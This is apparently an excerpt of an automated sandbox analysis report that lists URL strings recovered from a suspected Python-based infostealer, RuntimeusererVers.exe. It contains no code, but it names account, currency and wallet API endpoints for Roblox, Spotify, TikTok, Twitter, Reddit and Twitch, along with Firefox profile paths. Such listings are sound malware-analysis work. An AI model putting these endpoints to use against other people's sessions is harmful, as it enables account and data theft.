                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDC56E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338755146.00007FF7E225D000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://nuitka.net/info/segfault.htmlfor
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://oauth.reddit.com/api/v1/me
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://oauth.reddit.com/api/v1/meuNo
                      Source: RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://open.spotify.com/user/
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://open.spotify.com/user/u
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDC56E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://packaging.python.org/specifications/entry-points/
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://peps.python.org/pep-0205/
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDDC69000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B7311000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://peps.python.org/pep-0263/
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://peps.python.org/pep-0506/
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://peps.python.org/pep-0681/)
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pyopenssl.org/
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pyopenssl.org/a__uri__uPython
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pypi.org/project/attrs/)
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/python-attrs/attrs/main/.github/sponsors/FilePreviews.svg
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/python-attrs/attrs/main/.github/sponsors/Sentry.svg
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/python-attrs/attrs/main/.github/sponsors/Tidelift.svg
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/python-attrs/attrs/main/.github/sponsors/Variomedia.svg
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/python-attrs/attrs/main/docs/_static/attrs_logo.svg
                      Source: RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://requests.readthedocs.io
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://requests.readthedocs.ioa__url__u2.31.0a__version__l1
                      Source: RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://scriptkid.lol
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sentry.io/
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/questions/tagged/python-attrs)
                      Source: RuntimeusererVers.exe, 00000003.00000003.1418144108.0000022335173000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                      Source: RuntimeusererVers.exe, 00000003.00000003.1648622407.00000223350CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/prod
                      Source: RuntimeusererVers.exe, 00000003.00000003.1418144108.0000022335173000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.njy8xaI_aUJp
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://thumbnails.roblox.com/v1/users/avatar?userIds=
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tidelift.com/subscription/pkg/pypi-attrs?utm_source=pypi-attrs&utm_medium=pypi
                      Source: RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tidelift.com/subscription/pkg/pypi-attrs?utm_source=pypi-attrs&utm_medium=referral&utm_campa
                      Source: RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiktok.com/
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000003.00000003.1407351816.0000022334103000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com
                      Source: RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/D
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/home
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/i/api/1.1/account/update_profile.json
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/i/api/1.1/account/update_profile.jsonareqadescriptionuThere
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.comarefereruhttps://twitter.com/homeusec-fetch-destaemptyusec-fetch-modeacorsusec-fe
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxya__cause__u
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningsaInsecureRequestWarningu
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/contrib.html#socks-proxies
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/contrib.html#socks-proxiesatypingasocketT
                      Source: RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://webcast.tiktok.com/webcast/wallet_api/diamond_buy/permission/?aid=1988&app_language=de-DE&ap
                      Source: RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/)
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/en/latest/glossary.html#term-dunder-methods)).
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/en/latest/license.html)
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/en/latest/names.html)
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/en/stable/changelog.html
                      Source: RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/en/stable/changelog.html)
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/en/stable/comparison.html#customization)
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/en/stable/init.html#hooking-yourself-into-initialization).
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/en/stable/why.html#data-classes).
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDC56E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://www.ibm.com/
                      Source: RuntimeusererVers.exe, 00000003.00000003.1648622407.00000223350CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
                      Source: RuntimeusererVers.exe, 00000003.00000003.1418144108.0000022335173000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.d-GHL1OW1fkT
                      Source: RuntimeusererVers.exe, 00000003.00000003.1648622407.00000223350CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                      Source: RuntimeusererVers.exe, 00000003.00000003.1418144108.0000022335173000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.sYEKgG4Or0s6
                      Source: RuntimeusererVers.exe, 00000003.00000003.1420918494.0000022335173000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1418144108.0000022335173000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                      Source: RuntimeusererVers.exe, 00000003.00000003.1648622407.00000223350CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_so
                      Source: RuntimeusererVers.exe, 00000003.00000003.1418144108.0000022335173000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                      Source: RuntimeusererVers.exe, 00000003.00000003.1420918494.0000022335173000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000003.1418144108.0000022335173000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDD86F000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDD7E2000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6E8A000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.openssl.org/H
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.openssl.org/docs/manmaster/man3/X509_VERIFY_PARAM_set_flags.html
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.openssl.org/docs/manmaster/man3/X509_verify_cert_error_string.html#ERROR-CODES
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.openssl.org/docs/manmaster/man5/
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.pyopenssl.org
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000003.00000003.1407351816.0000022334103000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDC56E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDDC69000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B7311000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/psf/license/
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.reddit.com/user/
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.reddit.com/user/acomment_karmaatotal_karmaais_modais_goldais_suspendedD
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.roblox.com/my/account/json
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.roblox.com/my/account/jsonuhttps://economy.roblox.com/v1/users/aresaUserIdu/currencyuhtt
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.spotify.com/api/account-settings/v1/profile
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.spotify.com/api/account-settings/v1/profileatextaloadsaprofileagenderabirthdateD
                      Source: RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.tiktok.com/passport/web/account/info/?aid=1459&app_language=de-DE&app_name=tiktok_web&ba
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.twitch.tv/
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDCF6E000.00000004.00000020.00020000.00000000.sdmp, RuntimeusererVers.exe, 00000003.00000000.1338996339.00007FF7E2309000.00000002.00000001.01000000.00000004.sdmp, RuntimeusererVers.exe, 00000025.00000003.1505846472.00000195B6616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.twitch.tv/adisplayNameahasPrimeaisPartneralanguageaprofileImageURLabitsBalanceatotalCoun
